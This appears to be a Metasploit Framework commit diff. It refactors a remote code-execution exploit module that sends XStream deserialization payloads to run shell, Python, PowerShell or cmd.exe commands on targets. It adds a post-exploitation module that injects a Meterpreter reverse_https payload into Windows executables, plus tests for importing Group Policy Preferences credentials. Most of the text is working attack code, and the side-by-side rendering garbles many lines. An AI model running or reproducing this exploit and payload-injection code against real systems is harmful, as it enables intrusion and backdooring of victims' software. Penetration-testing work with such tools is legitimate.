{'type': 'cve', 'ref': 'CVE-2018-6317'}, {'type': 'cve', 'ref': '2018-6317'},
{'type': 'edb', 'ref': '43972'}, {'type': 'edb', 'ref': '43972'},
{'type': 'url', 'ref': 'https://github.com/nanopool/Claymore-Dual-Miner'} {'type': 'url', 'ref': 'https://github.com/nanopool/Claymore-Dual-Miner'}
], ],

View File

@ -37,25 +37,33 @@ class MetasploitModule < Msf::Exploit::Remote
'Targets' => [ 'Targets' => [
['Unix (In-Memory)', ['Unix (In-Memory)',
'Platform' => 'unix', 'Platform' => 'unix',
'Arch' => ARCH_CMD 'Arch' => ARCH_CMD,
'Type' => :unix_memory
],
['Windows (In-Memory)',
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Type' => :win_memory
], ],
['Python (In-Memory)', ['Python (In-Memory)',
'Platform' => 'python', 'Platform' => 'python',
'Arch' => ARCH_PYTHON 'Arch' => ARCH_PYTHON,
'Type' => :py_memory
], ],
=begin this stuff that doesn't work yet
['PowerShell (In-Memory)', ['PowerShell (In-Memory)',
'Platform' => 'win', 'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64] 'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_memory
], ],
=end
['Linux (Dropper)', ['Linux (Dropper)',
'Platform' => 'linux', 'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64] 'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper
], ],
['Windows (Dropper)', ['Windows (Dropper)',
'Platform' => 'win', 'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64] 'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper
] ]
], ],
'DefaultTarget' => 0 'DefaultTarget' => 0
@ -68,38 +76,34 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def check def check
if execute_command(random_crap) return CheckCode::Appears if execute_command(random_crap)
CheckCode::Appears
else CheckCode::Safe
CheckCode::Safe
end
end end
def exploit def exploit
case target.name case target['Type']
when /Unix/, /Python/, /PowerShell/ when /memory/
execute_command(payload.encoded) execute_command(payload.encoded)
else when /dropper/
execute_cmdstager execute_cmdstager
end end
end end
#
# Exploit methods
#
def execute_command(cmd, opts = {}) def execute_command(cmd, opts = {})
cmd = case target.name cmd =
when /Unix/, /Linux/ case target['Type']
%W{/bin/sh -c #{cmd}} when :unix_memory, :linux_dropper
when /Python/ %W{/bin/sh -c #{cmd}}
%W{python -c #{cmd}} when :py_memory
when /PowerShell/ %W{python -c #{cmd}}
# This doesn't work yet when :psh_memory
%W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}} opts = {remove_comspec: true, encode_final_payload: true}
when /Windows/ payload ? cmd_psh_payload(cmd, payload.arch, opts).split :
%W{cmd.exe /c #{cmd}} %W{powershell.exe -c #{cmd}}
end when :win_memory, :win_dropper
%W{cmd.exe /c #{cmd}}
end
# Encode each command argument with XML entities # Encode each command argument with XML entities
cmd.map! { |arg| arg.encode(xml: :text) } cmd.map! { |arg| arg.encode(xml: :text) }
@ -111,7 +115,9 @@ class MetasploitModule < Msf::Exploit::Remote
'data' => xstream_payload(cmd) 'data' => xstream_payload(cmd)
) )
check_response(res) || fail_with(Failure::UnexpectedReply, res.inspect) return false unless check_response(res)
true
end end
# java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO # java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO
@ -175,10 +181,6 @@ class MetasploitModule < Msf::Exploit::Remote
EOF EOF
end end
#
# Utility methods
#
def check_response(res) def check_response(res)
res && res.code == 500 && res.body.include?(error_string) res && res.code == 500 && res.body.include?(error_string)
end end
@ -188,7 +190,7 @@ EOF
end end
def random_crap def random_crap
Rex::Text.rand_text_alphanumeric(rand(42) + 1) Rex::Text.rand_text_alphanumeric(8..42)
end end
end end

View File

@ -0,0 +1,107 @@
require 'rex'
require 'msf/core/post/common'
class MetasploitModule < Msf::Post
include Msf::Post::Common
def initialize(info={})
super( update_info( info,
'Name' => 'Peinjector',
'Description' => %q{
This module will inject a specified windows payload into a target executable.
},
'License' => MSF_LICENSE,
'Author' => [ 'Maximiliano Tedesco <maxitedesco1@gmail.com>'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptString.new('PAYLOAD', [false, 'Windows Payload to inject into the targer executable.', "windows/meterpreter/reverse_https"]),
OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
OptString.new('TARGETPE', [false, 'Path of the target executable to be injected']),
OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."])
]
)
end
# Run Method for when run command is issued
def run
session.core.use('peinjector')
# syinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
# Check that the payload is a Windows one and on the list
if not session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")
return
end
# Set variables
pay_name = datastore['PAYLOAD']
lhost = datastore['LHOST']
lport = datastore['LPORT']
targetpe = datastore['TARGETPE']
opts = datastore['OPTIONS']
# Create payload
payload = create_payload(pay_name, lhost, lport, opts)
# Inject payload
inject_payload(payload, targetpe)
end
# Create a payload given a name, lhost and lport, additional options
def create_payload(name, lhost, lport, opts = "")
pay = client.framework.payloads.create(name)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
pay.datastore['EXITFUNC'] = 'thread'
pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler
if not opts.blank?
opts.split(",").each do |o|
opt,val = o.split("=",2)
pay.datastore[opt] = val
end
end
# Validate the options for the module
pay.options.validate(pay.datastore)
return pay
end
def inject_payload(pay, targetpe)
begin
print_status("Generating payload")
raw = pay.generate
param = {}
if pay.arch.join == ARCH_X64
threaded_shellcode = client.peinjector.add_thread_x64(raw)
param[:isx64] = true
else
threaded_shellcode = client.peinjector.add_thread_x86(raw)
param[:isx64] = false
end
param[:shellcode] = threaded_shellcode
param[:targetpe] = targetpe
param[:size] = threaded_shellcode.length;
print_status("Injecting #{pay.name} into the executable #{param[:targetpe]}")
client.peinjector.inject_shellcode(param)
print_good("Successfully injected payload into the executable: #{param[:targetpe]}")
rescue ::Exception => e
print_error("Failed to Inject Payload to executable #{param[:targetpe]}!")
print_error(e.to_s)
end
end
end

View File

@ -84,6 +84,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
" CI", " CI",
" Foundstone", " Foundstone",
" FusionVM XML", " FusionVM XML",
" Group Policy Preferences Credentials",
" IP Address List", " IP Address List",
" IP360 ASPL", " IP360 ASPL",
" IP360 XML v3", " IP360 XML v3",

View File

@ -21,6 +21,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Import' do
it_should_behave_like 'Msf::DBManager::Import::CI' it_should_behave_like 'Msf::DBManager::Import::CI'
it_should_behave_like 'Msf::DBManager::Import::Foundstone' it_should_behave_like 'Msf::DBManager::Import::Foundstone'
it_should_behave_like 'Msf::DBManager::Import::FusionVM' it_should_behave_like 'Msf::DBManager::Import::FusionVM'
it_should_behave_like 'Msf::DBManager::Import::GPP'
it_should_behave_like 'Msf::DBManager::Import::IP360' it_should_behave_like 'Msf::DBManager::Import::IP360'
it_should_behave_like 'Msf::DBManager::Import::IPList' it_should_behave_like 'Msf::DBManager::Import::IPList'
it_should_behave_like 'Msf::DBManager::Import::Libpcap' it_should_behave_like 'Msf::DBManager::Import::Libpcap'

View File

@ -0,0 +1,3 @@
RSpec.shared_examples_for 'Msf::DBManager::Import::GPP' do
it { is_expected.to respond_to :import_gpp_xml }
end